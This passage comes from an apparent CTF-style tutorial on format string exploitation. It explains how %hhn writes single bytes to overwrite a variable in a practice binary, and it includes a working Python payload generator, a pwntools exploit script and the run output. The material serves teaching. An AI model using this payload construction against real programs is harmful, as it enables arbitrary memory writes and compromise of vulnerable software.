0xffc1729c
aaaa$\xa0\x0modified a for a small number.
Actually, the key trick to master here is that we don't need to place the address at the very front — it can be placed anywhere, as long as we can find its corresponding offset.
Overwriting Large Numbers¶
Above we introduced overwriting small numbers. Here we introduce how to overwrite large numbers. As we mentioned above, we could choose to output a large number of bytes at once to perform the overwrite, but this basically won't succeed because it's too long. And even if it succeeds, the waiting time would be too long. So is there a better approach? Of course there is.
However, before introducing it, let's briefly review how variables are stored in memory. First, all variables are stored in memory in bytes. Furthermore, in x86 and x64 architectures, variables are stored in little-endian format, meaning the least significant byte is stored at the lowest address. For example, 0x12345678 is stored in memory from low address to high address as \x78\x56\x34\x12. Moreover, if we recall the flags in format strings, we can find these two flags:
hh For integer types, printf expects an int-sized argument promoted from a char.
h For integer types, printf expects an int-sized argument promoted from a short.
Therefore, we can use %hhn to write a single byte to an address, and %hn to write two bytes to an address. Here, we'll use single-byte writes as an example.
First, we still need to determine the address to overwrite. Using IDA, we can find the address is 0x0804A028.
.data:0804A028 public b
.data:0804A028 b dd 1C8h ; DATA XREF: main:loc_8048510r
That is, we want to overwrite in the following manner, with the overwrite address on the left and the overwrite content on the right:
0x0804A028 \x78
0x0804A029 \x56
0x0804A02a \x34
0x0804A02b \x12
First, since our string's offset is 6, we can determine that our payload basically looks like this:
p32(0x0804A028)+p32(0x0804A029)+p32(0x0804A02a)+p32(0x0804A02b)+pad1+'%6$n'+pad2+'%7$n'+pad3+'%8$n'+pad4+'%9$n'
We can calculate each part sequentially. Here is a basic construction, as follows:
def fmt(prev, word, index):
if prev < word:
result = word - prev
fmtstr = "%" + str(result) + "c"
elif prev == word:
result = 0
else:
result = 256 + word - prev
fmtstr = "%" + str(result) + "c"
fmtstr += "%" + str(index) + "$hhn"
return fmtstr
def fmt_str(offset, size, addr, target):
payload = ""
for i in range(4):
if size == 4:
payload += p32(addr + i)
else:
payload += p64(addr + i)
prev = len(payload)
for i in range(4):
payload += fmt(prev, (target >> i * 8) & 0xff, offset + i)
prev = (target >> i * 8) & 0xff
return payload
payload = fmt_str(6,4,0x0804A028,0x12345678)
The meaning of each parameter is basically as follows:
- offset represents the initial offset of the address to overwrite
- size represents the machine word length
- addr represents the address that will be overwritten
- target represents the target value we want to overwrite the variable with
The corresponding exploit is as follows:
def forb():
sh = process('./overwrite')
payload = fmt_str(6, 4, 0x0804A028, 0x12345678)
print payload
sh.sendline(payload)
print sh.recv()
sh.interactive()
The result is as follows:
➜ overwrite git:(master) ✗ python exploit.py
[+] Starting local process './overwrite': pid 78547
(\xa0\x0)\xa0\x0*\xa0\x0+\xa0\x0%104c%6$hhn%222c%7$hhn%222c%8$hhn%222c%9$hhn
[*] Process './overwrite' stopped with exit code 0 (pid 78547)
0xfff6f9bc
(\xa0\x0)\xa0\x0*\xa0\x0+\xa0\x0 X � \xbb ~modified b for a big number!
Of course, we could also use %n to write to each address separately, which would also give us the correct result. However, since each variable we write to will only affect the four bytes starting from it, after the last variable is written, we might modify the three bytes that follow. If those three bytes are important, the program could crash because of this. Using %hhn does not have this problem, because it only modifies a single byte at the corresponding address.